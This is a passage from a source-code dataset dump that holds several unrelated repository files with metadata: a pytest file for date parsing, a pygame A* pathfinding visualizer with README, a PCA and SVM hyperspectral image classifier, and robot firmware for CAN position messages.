"text": "import pytest\nimport pandas as pd\nfrom pyleiades.utils.code_conversion import code_to_name as ctn\nfrom pyleiades.utils.code_conversion import code_to_period as ctp\nfrom pyleiades.utils.code_conversion import parse_input_date as parser\n\nclass TestCTN:\n\n def test_convert_name(self):\n assert ctn(1) == 'coal'\n\n def test_invalid_entry(self):\n with pytest.raises(KeyError):\n ctn('test')\n\nclass TestCTP:\n\n def test_yearly_code(self):\n assert ctp('202013') == pd.Period('2020', 'Y')\n\n def test_monthly_code(self):\n assert ctp('202001') == pd.Period('202001', 'M')\n\n def test_invalid_code(self):\n with pytest.raises(ValueError):\n ctp('test24')\n\nclass TestDateParser:\n\n def test_read_format_yyyy(self):\n assert parser('2017') == pd.Period('2017', 'Y')\n\n def test_read_format_yyyymm(self):\n assert parser('201708') == pd.Period('2017-08', 'M')\n\n def test_read_format_yyyy_mm(self):\n assert parser('2017-08') == pd.Period('2017-08', 'M')\n\n def test_read_format_mm_yyyy(self):\n assert parser('08-2017') == pd.Period('2017-08', 'M')\n\n def test_read_format_invalid_separator_position(self):\n with pytest.raises(ValueError):\n parser('8-22-17')\n\n def test_read_format_invalid_nonspecific_year(self):\n with pytest.raises(ValueError):\n parser('082-017')\n\n def test_read_format_invalid_nonspecific_date(self):\n with pytest.raises(ValueError):\n parser('17')\n\n def test_read_format_invalid_characters(self):\n with pytest.raises(ValueError):\n parser('1500ad')\n\n def test_read_format_invalid_year_early(self):\n with pytest.raises(ValueError):\n parser('1500')\n\n def test_read_format_invalid_year_late(self):\n with pytest.raises(ValueError):\n parser('5650')\n\n def test_read_format_invalid_month(self):\n with pytest.raises(ValueError):\n parser('200055')\n"
},
{
"alpha_fraction": 0.6105263233184814,
"alphanum_fraction": 0.6105263233184814,
"avg_line_length": 18,
"blob_id": "7f23eb8c5eb16e5aadd9a4a8d086a64803fb1aa7",
"content_id": "40b562b759e6f1fe569401fc0ebd5dbd968315ad",
"detected_licenses": [
"BSD-2-Clause-Views"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 95,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/scripts/update_eia_data.py",
"repo_name": "mnegus01/enviro",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom pyleiades.update import main\n\nif __name__ == '__main__':\n main()\n"
}
] | 22 |
oognuyh/astar-visualization
|
https://github.com/oognuyh/astar-visualization
|
7491a8bb8f96b5252967ae742e00b2c280ec23f7
|
f8b452629da7056d8cdb8f1055ff0ddc4d423cd4
|
19b0ac741d412f640e54a9a16be42055ba75dd69
|
refs/heads/master
| 2023-01-29T08:59:30.044093 | 2020-11-30T15:04:55 | 2020-11-30T15:04:55 | 224,227,261 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4781047999858856,
"alphanum_fraction": 0.48861655592918396,
"avg_line_length": 36.943580627441406,
"blob_id": "2c147584fe73f5bd516b1349c73b0cb121471ba0",
"content_id": "b1c9ee2a958a0a751e2e6aabc4b2ca21b3056bdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19502,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 514,
"path": "/visual_astar.py",
"repo_name": "oognuyh/astar-visualization",
"src_encoding": "UTF-8",
"text": "# --------------------------------------------\n# by oognuyh\n# --------------------------------------------\nimport sys, os, heapq, math\nimport pygame as pg\nfrom pygame.locals import *\n# --------------------------------------------\n# TODO: \n# 1. wrong path when user allow diagonal lines(in_in_open() not changed the cell) - FIX 2019/11/27\n# --------------------------------------------\n# pygame initialize\npg.init()\n# center\nos.environ['SDL_VIDEO_CENTERED'] = '1'\npg.display.set_caption(\"A* visualization\")\nwidth = 800\nheight = 800\nmenuside = 270\nscreen = pg.display.set_mode((width + menuside, height))\n# --------------------------------------------\n# define points\nPATH = 0\nWALL = 1\nSTART = 2\nEND = 3\n# --------------------------------------------\n# define colours\nBLACK = (0, 0, 0) # wall, outline, background\nYELLOW = (255, 192, 0) # cell in open list\nRED = (157, 0, 0) # the starting point\nORANGE = (237, 125, 49) # cell in closed list\nBLUE = (68, 114, 196) # the current cell\nGREEN = (0, 157, 0) # the ending point\nGREY = (157, 157, 157) # path\nWHITE = (255, 255, 255) # text colour\n# --------------------------------------------\n# define cell size, grid height and grid width\ncellsize = 40\ngridheight = height // cellsize\ngridwidth = width // cellsize\n# --------------------------------------------\n# define heuristic weight limit\nweightlimit = 50\n# --------------------------------------------\n# define FPS\nFPS = 60\n# --------------------------------------------\n# define font\noptionfont = pg.font.Font(\"PrStart.ttf\", cellsize // 2)\n# --------------------------------------------\n# define directions\nUP = [0, -1]\nDOWN = [0, 1]\nLEFT = [-1, 0]\nRIGHT = [1, 0]\nTOPLEFT = [-1, -1]\nTOPRIGHT = [1, -1]\nBOTTOMLEFT = [-1, 1]\nBOTTOMRIGHT = [1, 1]\n# --------------------------------------------\nclass Cell:\n def __init__(self, coord):\n self.coord = coord\n self.parent = None # parent cell's coord\n self.G = 0 # G cost\n self.H = 0 # H cost\n self.F = 0 # F cost\n\n def __lt__(self, other): # define operator <\n return self.F < other.F \n\n def __eq__(self, other): # define operator ==\n return self.coord == other.coord\n\n def draw(self, colour): \n x, y = self.coord\n pg.display.update(pg.draw.rect(screen, colour, (x * cellsize, y * cellsize, cellsize, cellsize)))\n pg.display.update(pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)) # outline\n\nclass Astar:\n def __init__(self, grid, start, end, weight, using, diagonal, open_is_heapq):\n self.grid = grid\n self.start = list(start) # the starting point\n self.end = list(end) # the ending point\n self.using = using # to get heuristic\n self.diagonal = diagonal # if allow diagonal lines, True \n self.weight = weight # heuristic weight\n self.closed = [] # closed list\n self.open = [] # open list\n self.open_is_heapq = open_is_heapq\n if self.open_is_heapq:\n heapq.heapify(self.open) # list into heap\n\n def is_valid(self, coord):\n x, y = coord\n return -1 < x and x < gridwidth and -1 < y and y < gridheight and self.grid[x][y] != WALL and not self.is_in_closed(coord)\n\n def is_in_closed(self, coord): # if the cell is already in the closed list, return true\n for exist in self.closed:\n if coord == exist.coord:\n return True\n return False\n\n def is_in_open(self, cell): # if the cell isn't in the open list, return False\n for exist in range(len(self.open)):\n if self.open[exist] == cell: # if already exist, compare\n if cell < self.open[exist]:\n self.open[exist] = cell\n\n return True\n\n return False\n\n def calculate_heuristic(self, coord): \n # There are 4 ways to get H cost\n # 1. Manhattan distance\n # 2. euclidean distance\n # 3. chebyshev distance\n # 4. octile distance(new)\n x, y = coord\n endX, endY = self.end\n xDiff = abs(x - endX) * self.weight\n yDiff = abs(y - endY) * self.weight\n\n if self.using == \"manhattan\":\n return xDiff + yDiff\n elif self.using == \"euclidean\":\n return math.sqrt(xDiff ** 2 + yDiff ** 2)\n elif self.using == \"chebyshev\":\n return max(xDiff, yDiff)\n elif self.using == \"octile\":\n return min(xDiff, yDiff) * math.sqrt(2) + max(xDiff, yDiff) - min(xDiff, yDiff)\n\n def neighbours(self, cell):\n # visit neighbors(4 or 8 directions)\n # TOPLEFT UP TOPRIGHT\n # LEFT HEAD RIGHT\n # BOTTOMLEFT DOWN BOTTOMRIGHT\n up = add(cell.coord, UP)\n down = add(cell.coord, DOWN)\n right = add(cell.coord, RIGHT)\n left = add(cell.coord, LEFT)\n display = []\n if self.diagonal: # if user allowed diagonal lines, visit 8 directions\n topright = add(cell.coord, TOPRIGHT)\n topleft = add(cell.coord, TOPLEFT)\n bottomright = add(cell.coord, BOTTOMRIGHT)\n bottomleft = add(cell.coord, BOTTOMLEFT)\n\n if self.is_valid(topright):\n neighbour = Cell(topright)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(topleft):\n neighbour = Cell(topleft)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(bottomright):\n neighbour = Cell(bottomright)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list \n\n if self.is_valid(bottomleft):\n neighbour = Cell(bottomleft)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 14\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if self.is_valid(up):\n neighbour = Cell(up)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10 \n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H # F-cost = G-cost + H-cost\n if not self.is_in_open(neighbour): # if neighbor doesn't exist in the open list, push\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n\n if self.is_valid(down):\n neighbour = Cell(down)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n if self.is_valid(right):\n neighbour = Cell(right)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n\n if self.is_valid(left):\n neighbour = Cell(left)\n neighbour.parent = cell.coord\n neighbour.G = cell.G + 10\n neighbour.H = self.calculate_heuristic(neighbour.coord)\n neighbour.F = neighbour.G + neighbour.H\n if not self.is_in_open(neighbour):\n if self.open_is_heapq:\n heapq.heappush(self.open, neighbour)\n else:\n self.open.append(neighbour) # if the open list is list\n \n if not self.open_is_heapq:\n self.open = sorted(self.open) # if the open list is list\n\n def find(self):\n no_path = True # flag\n\n cell = Cell(self.start) # the first cell is starting point\n if self.open_is_heapq:\n heapq.heappush(self.open, cell) # push into the priority queue\n else:\n self.open.append(cell)\n\n while True: # find the shortest path\n for e in pg.event.get():\n if e.type == QUIT: # terminate the program\n pg.quit()\n sys.exit()\n\n if not self.open: break # if the open list is empty, break\n # print(\"---------------------\")\n # print(\"current = \", cell.coord)\n # print(\"---------------------\")\n # for o in self.open:\n # print(o.coord, o.F, end = \" \")\n # print(\"\\n---------------------\") # debugging\n \n if self.open_is_heapq:\n cell = heapq.heappop(self.open) # pop one cell with the smallest F-cost in the open list\n else:\n cell = self.open.pop(0) # if the open list is list\n\n # draw the process\n for o in self.open:\n if not (o.coord == self.start or o.coord == self.end):\n o.draw(YELLOW)\n for c in self.closed:\n if not (c.coord == self.start or c.coord == self.end):\n c.draw(ORANGE)\n if not (cell.coord == self.start or cell.coord == self.end):\n cell.draw(BLUE)\n\n pg.time.delay(70) # delay\n\n self.closed.append(cell) # put the cell in the closed list\n if cell.coord == self.end: # if cell.coord is the destination(e.g. the ending point is in closed list), break\n no_path = False # found path \n break\n\n self.neighbours(cell) # visit neighbors\n \n pg.time.delay(1000) # delay 1 sec\n \n if no_path: # if not found, return\n return\n\n while True: # if found the path, trace the parent coord\n if cell.coord == self.start: # if cell.coord is the starting point, done\n break\n \n # draw the found path\n if cell.coord != self.end:\n cell.draw(GREY)\n\n for exist in self.closed:\n if cell.parent == exist.coord:\n cell = exist\n break\n \n pg.time.delay(1500) # delay 1.5 sec\n\nclass Option:\n def __init__(self, coord, text):\n self.coord = coord\n self.text = text\n self.state = False # on, off\n self.circle = None # for event\n\n def txt(self): # set text\n x, y = self.coord\n x = (gridwidth + x + 1) * cellsize\n y = y * cellsize + 10\n \n obj = optionfont.render(self.text, True, WHITE)\n obj_rect = obj.get_rect()\n obj_rect.topleft = x, y\n screen.blit(obj, obj_rect)\n\n def draw(self):\n x, y = self.coord\n x = (gridwidth + x) * cellsize + (cellsize // 2)\n y = y * cellsize + (cellsize // 2)\n\n self.txt()\n if self.state:\n self.circle = pg.draw.circle(screen, RED, (x, y), cellsize // 4)\n else:\n self.circle = pg.draw.circle(screen, WHITE, (x, y), cellsize // 4)\n\n def is_clicked(self, pos):\n if self.circle.collidepoint(pos):\n return True\n return False\n\n# --------------------------------------------\ndef add(one, another): \n result = []\n for a, b in zip(one, another):\n result.append(a + b)\n return result\n\n# --------------------------------------------\ndef txt(pos, text):\n x, y = pos\n x = (gridwidth + x) * cellsize + 10\n y = y * cellsize + 10\n obj = optionfont.render(text, True, WHITE)\n obj_rect = obj.get_rect()\n obj_rect.topleft = x, y\n screen.blit(obj, obj_rect)\n\ndef draw_grid(grid):\n for x in range(len(grid)):\n for y in range(len(grid[0])):\n if grid[x][y] == WALL:\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize))\n elif grid[x][y] == PATH:\n pg.draw.rect(screen, WHITE, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1) # outline\n elif grid[x][y] == START:\n pg.draw.rect(screen, RED, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)\n elif grid[x][y] == END:\n pg.draw.rect(screen, GREEN, (x * cellsize, y * cellsize, cellsize, cellsize))\n pg.draw.rect(screen, BLACK, (x * cellsize, y * cellsize, cellsize, cellsize), 1)\n\ndef draw_menu(options, diagonal, weight, open_is_heapq):\n for option in options: # draw options\n option.draw()\n diagonal.draw()\n open_is_heapq.draw()\n\n txt([0, 10], \"press left\") # explain how to control weight\n txt([0, 11], \", right key\")\n weighttxt = \"weight : \"\n txt([0, 12], weighttxt + str(weight))\n txt([0, gridheight - 1], \" PRESS ENTER\") # explain how to start\n\n# --------------------------------------------\ndef execute():\n # initialize grid settings\n grid = [[PATH for y in range(gridheight)] for x in range(gridwidth)] # create\n grid[0][0] = START # set the starting point\n start = 0, 0\n grid[gridwidth - 1][gridheight - 1] = END # set the ending point\n end = gridwidth - 1, gridheight - 1\n \n # initialize menu\n manhattan = Option([0, 1], \"manhattan\")\n manhattan.state = True\n using = manhattan.text\n euclidean = Option([0, 2], \"euclidean\")\n chebyshev = Option([0, 3], \"chebyshev\")\n octile = Option([0, 4], \"octile\")\n options = [manhattan, euclidean, chebyshev, octile]\n diagonal = Option([0, 7], \"diagonal\")\n diagonal.state = True\n weight = 10\n open_is_heapq = Option([0, 8], \"using heapq\")\n open_is_heapq.state = False\n\n # clicked \n is_cell_clicked = False\n is_start_clicked = False\n is_end_clicked = False\n change = []\n\n is_running = True\n while is_running:\n pos = pg.mouse.get_pos()\n x, y = (pos[0] // cellsize, pos[1] // cellsize)\n\n for e in pg.event.get():\n if e.type == QUIT: # terminate the program\n pg.quit()\n sys.exit()\n if e.type == KEYDOWN:\n if e.key == K_RETURN: # find the shortest path \n Astar(grid, start, end, weight, using, diagonal.state, open_is_heapq.state).find()\n\n elif e.key == K_LEFT: # weight --\n if 1 < weight:\n weight = weight - 2\n elif e.key == K_RIGHT: # weight ++\n if weight < weightlimit - 1:\n weight = weight + 2\n\n elif e.type == MOUSEBUTTONDOWN: # click\n if x < gridwidth:\n if (x, y) == start:\n is_start_clicked = True\n elif (x, y) == end:\n is_end_clicked = True\n else:\n change.append([x, y])\n if grid[x][y] == WALL:\n grid[x][y] = PATH\n elif grid[x][y] == PATH:\n grid[x][y] = WALL \n is_cell_clicked = True \n\n for option in options: # radio button\n if option.is_clicked(pos):\n option.state = True\n using = option.text\n for opt in options:\n if opt.coord != option.coord:\n opt.state = False\n\n if diagonal.is_clicked(pos): # check box\n if diagonal.state:\n diagonal.state = False\n else:\n diagonal.state = True\n \n if open_is_heapq.is_clicked(pos):\n if open_is_heapq.state:\n open_is_heapq.state = False\n else:\n open_is_heapq.state = True\n\n elif e.type == MOUSEMOTION: # move\n if x < gridwidth:\n if is_cell_clicked:\n if [x, y] not in change: \n change.append([x, y])\n if grid[x][y] == WALL:\n grid[x][y] = PATH\n elif grid[x][y] == PATH:\n grid[x][y] = WALL\n elif is_start_clicked and not ((x, y) == end):\n if grid[x][y] != WALL:\n grid[start[0]][start[1]] = PATH\n grid[x][y] = START\n start = x, y\n elif is_end_clicked and not ((x, y) == start):\n if grid[x][y] != WALL:\n grid[end[0]][end[1]] = PATH\n grid[x][y] = END\n end = x, y \n\n elif e.type == MOUSEBUTTONUP: # release\n if is_cell_clicked:\n change = []\n is_cell_clicked = False\n elif is_start_clicked:\n is_start_clicked = False\n elif is_end_clicked:\n is_end_clicked = False\n \n screen.fill(BLACK) # background\n\n draw_grid(grid)\n draw_menu(options, diagonal, weight, open_is_heapq)\n\n pg.display.flip() # update the screen\n pg.time.Clock().tick(FPS) # fps\n \n# --------------------------------------------\nif __name__ == \"__main__\":\n execute()"
},
{
"alpha_fraction": 0.5574935674667358,
"alphanum_fraction": 0.700904369354248,
"avg_line_length": 42,
"blob_id": "1d6e4c4bda1a28ee9fe1d5699900579c7ecb4631",
"content_id": "f1597d1e95762f47faf81971bbc5607cbcad9165",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1548,
"license_type": "no_license",
"max_line_length": 561,
"num_lines": 36,
"path": "/README.md",
"repo_name": "oognuyh/astar-visualization",
"src_encoding": "UTF-8",
"text": "# **A Star Algorithm Visualization**\nThis is a program implemented to learn more about A* algorithm.\n\n## Features\n * Choose one of four heuristics below \n |Manhattan|Chebyshev|Octile|Euclidean|\n |:-------:|:-------:|:----:|:-------:|\n |<img src=\"https://user-images.githubusercontent.com/48203569/100442237-0688ab80-30eb-11eb-8159-ddaddccaab13.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442242-07214200-30eb-11eb-8490-97e1d073b24e.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442249-07b9d880-30eb-11eb-9e47-f317d065d9a7.png\" height=\"120\" width=\"250\">|<img src=\"https://user-images.githubusercontent.com/48203569/100442244-07214200-30eb-11eb-81b2-160d02ef6484.png\" height=\"120\" width=\"250\">|\n * Control weight\n * Drag to create/remove a wall\n * Choose between heap queue and list for open/closed list data structure\n * Allow diagonal movement\n\n## Usage\n ``` \n // if pygame is not installed\n pip3 install pygame\n \n // visual_astar.py and PrStart.ttf(Font) files must be in the same path\n python3 visual_astar.py\n ```\n \n * Color \n * Red : start point\n * Green : end point\n * Blue : current point\n * Yellow : points in open list\n * Orange : points in closed list\n * Grey : Path\n * Black : Wall\n\n## Demo\n <img src=\"https://user-images.githubusercontent.com/48203569/100443725-94659600-30ed-11eb-996a-effe05e8c2f1.gif\" height=\"500\" width=\"500\">\n\n## Library used\n * [pygame](https://www.pygame.org/news)\n"
}
] | 2 |
Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM
|
https://github.com/Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM
|
ae7a71528d052060791412f6bbc4898e56069a4f
|
92fc899ef5e5481aae1205e466af59071ad19768
|
29dea6e974dde5983883fd52a971d1a93bd182c2
|
refs/heads/master
| 2020-07-01T18:01:13.255777 | 2019-12-14T13:13:38 | 2019-12-14T13:13:38 | 201,247,431 | 0 | 0 | null | 2019-08-08T11:49:24 | 2019-05-09T09:11:06 | 2019-05-09T09:11:04 | null |
[
{
"alpha_fraction": 0.7865961194038391,
"alphanum_fraction": 0.7989417910575867,
"avg_line_length": 55.70000076293945,
"blob_id": "a4a541612d2f616caf6c14cdfea2232897937730",
"content_id": "44eb47ed8b5ff27875083dba8965a0b716feceee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 398,
"num_lines": 10,
"path": "/README.md",
"repo_name": "Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM",
"src_encoding": "UTF-8",
"text": "# Classification-of-hyperspectral-imaging-using-PCA-and-SVM\n\nThis work is based on Hyperspectral Image 'AVIRIS-Indian Pines'.At first Principal Component Analysis was performed in order to reduce the high dimension of the image. After that the image was splitted into 80:20 training and testing ratio. After that support vectore machine was used to classify the dataset.The RBF kernel was used for SVM .The parameter of rbf kernel was tuned via GridSearchCV. \n\n\nReuirement: \n\n1.scikit-learn -https://scikit-learn.org/stable/\n\nThe whole work is done using Python 3.6.\n"
},
{
"alpha_fraction": 0.724438488483429,
"alphanum_fraction": 0.7418705821037292,
"avg_line_length": 21.406015396118164,
"blob_id": "8c615d853b0f23bfd5d73488143ce5ade4f28cb7",
"content_id": "e01e0b98e9f563e7c4bf0a5fa7dec219d2bf2717",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2983,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 133,
"path": "/Begining.py",
"repo_name": "Hariharan20081998/Classification-of-hyperspectral-imaging-using-PCA-and-SVM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 11 08:34:07 2019\n\n@author: Sajal\n\"\"\"\n\nimport numpy as np\nfrom sklearn.decomposition import PCA\nimport scipy.io as sio\nnp.random.seed(7)\n\nData=sio.loadmat('Indian_pines_corrected.mat')['indian_pines_corrected']\nLabel=sio.loadmat('Indian_pines_gt.mat')['indian_pines_gt']\n\nData=np.reshape(Data,(Data.shape[0]*Data.shape[1],Data.shape[2]))\n\nLabel=np.reshape(Label,(Label.shape[0]*Label.shape[1]))\n\nLabels,counts=np.unique(Label,return_counts=True)\n\nData=Data[Label>0,:]\nLabel=Label[Label>0]\n\nLabels,counts=np.unique(Label,return_counts=True)\n\n\nLabels,counts=np.unique(Label,return_counts=True)\n\n#Standardizing the values \n\"\"\"\nfrom sklearn import preprocessing\nscaler = preprocessing.StandardScaler().fit(Data) \nData= scaler.transform(Data)\n\n\"\"\"\n\n#Train-Test Split\n\nfrom sklearn.model_selection import train_test_split\n\ntestRatio=0.20\n\nX_train, X_test, y_train, y_test = train_test_split(Data, Label, test_size=testRatio, random_state=345,\n stratify=Label)\n\n\n\n#Applying Scalar to train and test Dataset\n\nfrom sklearn import preprocessing\nscaler = preprocessing.StandardScaler().fit(X_train) \nX_train= scaler.transform(X_train)\nX_test=scaler.transform(X_test)\n\n\n\n\n\n\n\n#Applying PCA \n\n\nimport matplotlib.pyplot as plt\npca = PCA(n_components=30)\npca.fit_transform(X_train)\nnewspace=pca.components_\nnewspace=newspace.transpose()\nX_train=np.matmul(X_train,newspace)\nprint(pca.n_components_)\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Inidian_pines Dataset Explained Variance')\nplt.show()\nX_test=np.matmul(X_test,newspace)\n\n\n#Appplying SVM \n\nfrom sklearn.svm import SVC\n\nclf = SVC(C=10,gamma=0.01)\n\nclf.fit(X_train, y_train)\n\n#model tuning\n\nimport time\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\n\nstart=time.time()\nC_range = np.logspace(-2, 10, 13)\ngamma_range=np.logspace(-9, 3, 13)\nparam_grid = dict(C=C_range,gamma=gamma_range)\ncv = StratifiedShuffleSplit(n_splits=3, test_size=0.2, random_state=42)\ngrid = GridSearchCV(clf, param_grid, cv=cv, scoring='accuracy', return_train_score=False)\ngrid.fit(X_train,y_train)\nprint(grid.best_score_)\nprint(grid.best_params_)\nend=time.time()\nprint(end-start)\n\n\n\nimport pickle\npickle_out = open(\"Firstgrid16.pickle\",\"wb\")\npickle.dump(grid, pickle_out)\npickle_out.close()\n\npickle_in = open(\"Firstgrid16.pickle\",\"rb\")\nexample_dict = pickle.load(pickle_in)\nexample_dict.best_estimator_\n\n#Predicting accuracy\ny_pred=clf.predict(X_test) \nfrom sklearn.metrics import accuracy_score\nacc=accuracy_score(y_test, y_pred)\n\n\nfrom sklearn.metrics import confusion_matrix\ncm=confusion_matrix(y_test,y_pred)\n\n\nfrom sklearn.metrics import cohen_kappa_score\nprint(cohen_kappa_score(y_test,y_pred))\n\nfrom sklearn.metrics import cohen_kappa_score\nprint(cohen_kappa_score(y_test,y_pred))\n\n\n\n"
}
] | 2 |
SnaKyEyeS/robot-software
|
https://github.com/SnaKyEyeS/robot-software
|
0d3ea982c483e4d7eda9ecefffbf3dbfee92fd59
|
69b14d75d416959d5eae61849ae2701826470eea
|
86b5e613cb699f905426c6b514dd07f690425f7c
|
refs/heads/master
| 2022-12-03T10:10:59.466584 | 2020-06-12T17:49:25 | 2020-06-24T21:53:45 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6712891459465027,
"avg_line_length": 28.953845977783203,
"blob_id": "762f8a690c42da7321e915916986f39e95d769c1",
"content_id": "7599fca2a00382b95df5b5473a2b7cca6fca9484",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1947,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 65,
"path": "/master-firmware/src/can/uwb_position_handler.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <uavcan/uavcan.hpp>\n#include <cvra/uwb_beacon/TagPosition.hpp>\n#include <aversive/math/geometry/vect_base.h>\n#include <error/error.h>\n#include \"main.h\"\n#include \"uwb_position_handler.h\"\n#include \"base/base_controller.h\"\n#include \"control_panel.h\"\n#include \"protobuf/beacons.pb.h\"\n#include <timestamp/timestamp.h>\n\nusing TagPosition = cvra::uwb_beacon::TagPosition;\n\nTOPIC_DECL(allied_position_topic, AlliedPosition);\nTOPIC_DECL(last_panel_contact_topic, Timestamp);\n\nstatic uavcan::LazyConstructor<uavcan::Publisher<TagPosition>> publisher;\n\nstatic void position_cb(const uavcan::ReceivedDataStructure<TagPosition>& msg)\n{\n AlliedPosition pos;\n pos.x = msg.x;\n pos.y = msg.y;\n pos.timestamp.us = timestamp_get();\n\n // This is the panel\n if (msg.x < -1000) {\n Timestamp msg;\n msg.us = timestamp_get();\n messagebus_topic_publish(&last_panel_contact_topic.topic, &msg, sizeof(msg));\n } else {\n messagebus_topic_publish(&allied_position_topic.topic, &pos, sizeof(pos));\n }\n}\n\nint uwb_position_handler_init(uavcan::INode& node)\n{\n messagebus_advertise_topic(&bus, &allied_position_topic.topic, \"/allied_position\");\n messagebus_advertise_topic(&bus, &last_panel_contact_topic.topic, \"/panel_contact_us\");\n\n static uavcan::Subscriber<TagPosition> position_sub(node);\n auto res = position_sub.start(position_cb);\n\n if (res != 0) {\n return res;\n }\n\n publisher.construct<uavcan::INode&>(node);\n\n static uavcan::Timer periodic_timer(node);\n periodic_timer.setCallback([](const uavcan::TimerEvent& event) {\n (void)event;\n TagPosition msg;\n {\n absl::MutexLock l(&robot.lock);\n msg.x = position_get_x_double(&robot.pos);\n msg.y = position_get_y_double(&robot.pos);\n }\n publisher->broadcast(msg);\n });\n\n periodic_timer.startPeriodic(uavcan::MonotonicDuration::fromMSec(300));\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6679920554161072,
"alphanum_fraction": 0.6779323816299438,
"avg_line_length": 20.869565963745117,
"blob_id": "19f75d910696373c412656bd28b100c1b532478b",
"content_id": "88e9008cd097d98ba4773783aca3b334f7229f0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 503,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/actuator-firmware/src/uavcan/feedback_publisher.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <ch.h>\n#include <hal.h>\n#include \"board.h\"\n#include \"feedback_publisher.h\"\n#include <cvra/actuator/Feedback.hpp>\n#include \"analog_input.h\"\n\nvoid feedback_publish(uavcan::INode& node)\n{\n static uavcan::Publisher<cvra::actuator::Feedback> pub(node);\n float analog[2];\n\n analog_input_read(analog);\n\n cvra::actuator::Feedback msg;\n\n msg.analog_input[0] = analog[0];\n msg.analog_input[1] = analog[1];\n\n msg.digital_input = board_digital_input_read();\n\n pub.broadcast(msg);\n}\n"
},
{
"alpha_fraction": 0.6409969329833984,
"alphanum_fraction": 0.644917368888855,
"avg_line_length": 24.32624053955078,
"blob_id": "a63a1c2d93c771d0d5424b2b4ce617a0142157b7",
"content_id": "ebd4c92fc7031a1178afccb723fefb045e8fcaa2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3571,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 141,
"path": "/master-firmware/src/can/can_uwb_ip_netif.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
